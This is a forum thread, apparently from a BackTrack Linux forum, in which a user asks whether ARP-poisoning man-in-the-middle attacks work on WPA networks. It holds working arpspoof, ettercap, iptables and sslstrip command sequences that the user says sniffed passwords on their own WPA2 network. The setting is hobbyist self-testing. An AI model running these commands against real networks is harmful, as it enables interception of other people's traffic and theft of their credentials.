Is Arp-Poisoning MITM attack possible on WPA network?

[BobaFett]

Hi guys,
I've been piddling around with arp-poisoning using Ettercap-ng and Arpspoof along with Sslstrip and various Dsniff programs like urlsnarf, webspy, etc. I can succesfully perform a mitm on my open network and on my network with WEP encryption enabled, but I would like to be able to do the same on it with WPA encryption enabled. (Obviously I know the passkey cause its my network.)
I was previously under the impression that it was difficult or impossible to perform an Arp Poisoning on a WPA encrypted network due to the fact that merely knowing the passkey is not sufficient to decrypt the packets because of the WPA handshake. Then I stumbled upon this thread "http://www.backtrack-linux.org/forums/old-newbie-area/24774-ettercap-wpa.html" which claimed that performing a mitm attack on a WPA network is done exactly the same as on an unencrypted network (no handshake or passkey stuff required as long as you're connected to the AP).
Incidently, I have tried performing the attack just like on and unencrypted network (except I tried bothe Arpspoof and Ettercap-ng) but I end up DOSing both myself and my victim laptop.

So, my questions are:

1. Is the answer to this thread correct in saying that performing a MITM attack on a WPA is done the same as on an open network?

2. If question 1. is "yes", then what am I doing wrong? (I will post my commands if that is the case)

Thanks in advance!

[TAPE]

Well you're connected to the network right ? So yes..

Posting commands used is always good to allow people to see what you have tried.

[BobaFett]

Ok, thanks. I appreciate the help. I'm fairly certain its not a driver issue cause as I said before aircrack-ng works fine. I am using Backtrack 4 running on a Dell Mini 9 with an Intel 5100 card.

Here are my commands. obviously they are run as root.

Using Arpspoof:

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

sslstrip -k -f -l 8080

arpspoof -i wlan0 -t 192.168.1.7 192.168.1.1

Using Ettercap-NG:

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

sslstrip -k -f -l 8080

ettercap -T -i wlan0 -Tq -M ARP // //

Also, for etter.conf I have cahnged ec_uid to 0, and ec_gid to 0. I did not uncomment the iptables line since I was using Sslstrip.

Thanks for the help! I really appreciate it.

[BobaFett]

Ok, I figured it out. Thanks TAPE for clarifying that its possible. For all those who may read this post in the future I would like to clarify:
Contrary to what some other sites (I can remember specifically but I've read it somewhere) say, it is entirely possible to perform a MITM attack using Arpspoof (and probably Ettercap to but I haven't got it to work yet) on a WPA or WPA2 encrypted network. I sucessfully used Arpspoof and Sslstrip to sniff passwords on my WPA2 network. I'm sure many many people have done this before but I had spent a long time trying to find out if it was even possible, which it is.

Just in case anyone is wondering what commands I used:

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

cd /home/christopher/.sslstrip-0.7 #of course you will have to change this to your location

python sslstrip.py -k -f -l 8080

[TAPE]

Perhaps best to first try and single out a specific host with ettercap

Code:

ettercap -Tq -i wlan0 -M arp:remote /192.168.1.7/ /192.168.1.1/

[Gitsnik]

Perhaps best to first try and single out a specific host with ettercap

Code:

ettercap -Tq -i wlan0 -M arp:remote /192.168.1.7/ /192.168.1.1/

Also, rather than using the tools, learn how this sort of thing works - it is possible to hand generate our ARP packets and send them off. Less network traffic lets you learn what's going on and also reason out why things would be hurting a bit here.

[BobaFett]

Thanks guys! Actually, I've got it working with Ettercap in the meantime using the same commands as on an unencrypted network. Sorry I'm so slow to post. Thanks for the help TAPE, I actually had set specific targets I just typed it wrong in my post, but thanks for your time.
Also, Gitsnik, thanks for the tip, I'll look into making my own Arp packets. That sounds like a useful thing to know how to do. I really appreciate you guys.
I will mark this thread as solved.
Thanks!

edit: Actually, I can't figure out how to mark this thread as solved. If this is important please let me know how, otherwise I will assume that only the Admins can do that. thanks guys